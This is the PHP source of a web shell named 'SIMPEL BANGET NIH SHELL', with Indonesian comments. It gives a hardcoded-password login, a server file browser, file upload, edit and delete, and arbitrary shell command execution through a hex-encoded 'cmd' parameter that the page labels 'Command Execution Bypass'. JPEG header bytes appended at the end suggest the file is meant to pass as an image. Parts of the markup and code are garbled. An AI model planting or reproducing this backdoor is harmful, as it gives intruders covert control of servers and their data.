session_start();

$username = "admin";
$passwordHash = "6c90e5171bfdc3c62ce8925898e0db2d";

// Autentikasi
if (isset($_POST['username']) && isset($_POST['password'])) {
$inputUsername = $_POST['username'];
$inputPassword = md5($_POST['password']);

if ($inputUsername === $username && $inputPassword === $passwordHash) {
$token = generateUUID(); // Fungsi generateUUID dijelaskan di bawah
$_SESSION['token'] = $token;
$_SESSION['authenticated'] = true;
$_SESSION['username'] = $username;
} else {
echo "Login gagal!";
exit;
}
}

// Cek sesi autentikasi
if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {

exit;
}

// Sesi autentikasi sukses, lanjutkan eksekusi kode berikutnya
$dir = isset($_GET['dir']) ? hex2bin($_GET['dir']) : '.';
$files = scandir($dir);
$upload_message = '';
$edit_message = '';
$delete_message = '';

function get_file_permissions($file): string {
return substr(sprintf('%o', fileperms($file)), -4);
}

function is_writable_permission($file): bool {
return is_writable($file);
}

function executeCommand($command, $workingDirectory = null)
{
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);

$process = proc_open($command, $descriptorspec, $pipes, $workingDirectory);

if (is_resource($process)) {
// Read output from stdout and stderr
$output_stdout = stream_get_contents($pipes[1]);
$output_stderr = stream_get_contents($pipes[2]);

fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);

$return_value = proc_close($process);

return "Output (stdout):\n" . $output_stdout . "\nOutput (stderr):\n" . $output_stderr;
} else {
return "Failed to execute command.";
}
}

if (isset($_GET['636d64'])) {
$command = hex2bin($_GET['636d64']);
$result = executeCommand($command, $dir);
}

if (isset($_FILES['file_upload'])) {
if (move_uploaded_file($_FILES['file_upload']['tmp_name'], $dir . '/' . $_FILES['file_upload']['name'])) {
$upload_message = 'File berhasil diunggah.';
} else {
$upload_message = 'Gagal mengunggah file.';
}
}

if (isset($_POST['edit_file'])) {
$file = $_POST['edit_file'];
$content = file_get_contents($file);
if ($content !== false) {

<!DOCTYPE html>
<html lang="en">

<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
Edit File <title>Edit File</title>
<style>
body {
font-family: Arial, sans-serif;
margin: 0;
padding: 0;
text-align: center;
}
header {
background-color: #4CAF50;
color: white;
padding: 1rem;
}
header h1 {
margin: 0;
}
main {
padding: 1rem;
}
form {
width: 50%;
margin: auto;
text-align: left;
}
textarea {
width: 100%;
height: 300px;
}
input[type="submit"] {
background-color: #4CAF50;
border: none;
color: white;
cursor: pointer;
margin-top: 1rem;
padding: 0.5rem 1rem;
text-align: center;
text-decoration: none;
display: inline-block;
font-size: 12px;
}
input[type="submit"]:hover {
background-color: #45a049;
}
.btn {
background-color: #4CAF50;
border: none;
color: white;
cursor: pointer;
margin-left: 1rem;
padding: 0.5rem 1rem;
text-align: center;
text-decoration: none;
display: inline-block;
font-size: 12px;
}

.btn-download {
background-color: #008CBA; /* Ganti warna sesuai kebutuhan */
border: none;
color: white;
cursor: pointer;
margin-left: 1rem;
padding: 0.5rem 1rem;
text-align: center;
text-decoration: none;
display: inline-block;
font-size: 12px;
}

.btn:hover {
background-color: #45a049;
}
</style>

<header>

Edit File

</header>
<main>

</main>

exit;
} else {
$edit_message = 'Gagal membaca isi file.';
}
}

if (isset($_POST['submit_edit'])) {
$file = $_POST['edited_file'];
$content = $_POST['file_content'];
if (file_put_contents($file, $content) !== false) {
$edit_message = 'File berhasil diedit.';
} else {
$edit_message = 'Gagal mengedit file.';
}
}

if (isset($_POST['delete_file'])) {
$file = $_POST['delete_file'];
if (unlink($file)) {
$delete_message = 'File berhasil dihapus.';
} else {
$delete_message = 'Gagal menghapus file.';
}
}

$uname = Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64;
$current_dir = realpath($dir);

function generateUUID()
{
return sprintf(
'%04x%04x-%04x-%04x-%04x-%04x%04x%04x',
mt_rand(0, 0xffff),
mt_rand(0, 0xffff),
mt_rand(0, 0xffff),
mt_rand(0, 0x0fff) | 0x4000,
mt_rand(0, 0x3fff) | 0x8000,
mt_rand(0, 0xffff),
mt_rand(0, 0xffff),
mt_rand(0, 0xffff)
);
}

<!DOCTYPE html>
<html lang="en">

<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
SIMPEL BANGET NIH SHELL <title>SIMPEL BANGET NIH SHELL</title>
<style>
body {
font-family: Arial, sans-serif;
margin: 0;
padding: 0;
text-align: center;
}
header {
background-color: #4CAF50;
color: white;
padding: 1rem;
}
header h1 {
margin: 0;
}
main {
padding: 1rem;
}
table {
border-collapse: collapse;
margin: 1rem auto;
width: 50%;
}
th, td {
border: 1px solid #ddd;
padding: 0.5rem;
text-align: left;
}
th {
background-color: #f2f2f2;
}
tr:nth-child(even) {
background-color: #f2f2f2;
}
tr:hover {
background-color: #ddd;
}
form {
display: inline-block;
margin: 1rem 0;
}
input[type="submit"] {
background-color: #4CAF50;
border: none;
color: white;
cursor: pointer;
margin-left: 1rem;
padding: 0.5rem 1rem;
text-align: center;
text-decoration: none;
display: inline-block;
font-size: 12px;
}
input[type="submit"]:hover {
background-color: #45a049;
}
/* Gaya CSS untuk hasil command */
div {
background-color: #f9f9f9;
border: 1px solid #ddd;
padding: 10px;
margin-top: 20px;
overflow: auto;
}

pre {
white-space: pre-wrap;
word-wrap: break-word;
}

.btn {
background-color: #4CAF50;
border: none;
color: white;
cursor: pointer;
margin-left: 1rem;
padding: 0.5rem 1rem;
text-align: center;
text-decoration: none;
display: inline-block;
font-size: 12px;
}

.btn-download {
background-color: #008CBA; /* Ganti warna sesuai kebutuhan */
border: none;
color: white;
cursor: pointer;
margin-left: 1rem;
padding: 0.5rem 1rem;
text-align: center;
text-decoration: none;
display: inline-block;
font-size: 12px;
}

.btn:hover {
background-color: #45a049;
}
</style>

<header>

SIMPEL BANGET NIH SHELL

</header>
<main>
<p>Current directory: echo $current_dir; </p>
<p>Server information: echo $uname; </p>
if (!empty($upload_message)):
<p> echo $upload_message; </p>
endif;
if (!empty($edit_message)):
<p> echo $edit_message; </p>
endif;
if (!empty($delete_message)):
<p> echo $delete_message; </p>
endif;

<th>Filename</th>
<th>Permissions</th>
<th>Actions</th>

foreach ($files as $file):

<td style="color: echo is_writable_permission($dir . '/' . $file) ? 'green' : 'red'; ">
echo is_file($dir . '/' . $file) ? get_file_permissions($dir . '/' . $file) : (is_writable_permission($dir . '/' . $file) ? 'Directory' : 'Directory (No writable)');

endforeach;

if (is_dir($dir . '/' . $file)):
<a href="?dir= echo bin2hex($dir . '/' . $file); " style="color: echo is_writable_permission($dir . '/' . $file) ? 'inherit' : 'red'; "> echo $file; </a>
else:
<a href="a.php?dir= echo bin2hex($dir); &editfile= echo urlencode($file); " style="color: echo is_writable_permission($dir . '/' . $file) ? 'inherit' : 'red'; "> echo $file; </a>
endif;

if (is_file($dir . '/' . $file)):

endif;

<p>Command Execution Bypass</p>
<form method="GET
">
<label>encode your command on <a href="https://encode-decode.com/bin2hex-decode-online/">https://encode-decode.com/bin2hex-decode-online/</a> :</label>

if (isset($result)):
<div>

Command Result:

<pre> echo htmlspecialchars($result); </pre>
</div>
endif;
</main>

��JFIF��x�x��"
��C�

��C��"��
��}�!1AQa"q2��#B��R��$3br�
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��
��w�!1AQaq"2�B�� #3R�br�
$4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��?��N��m?��j��EP��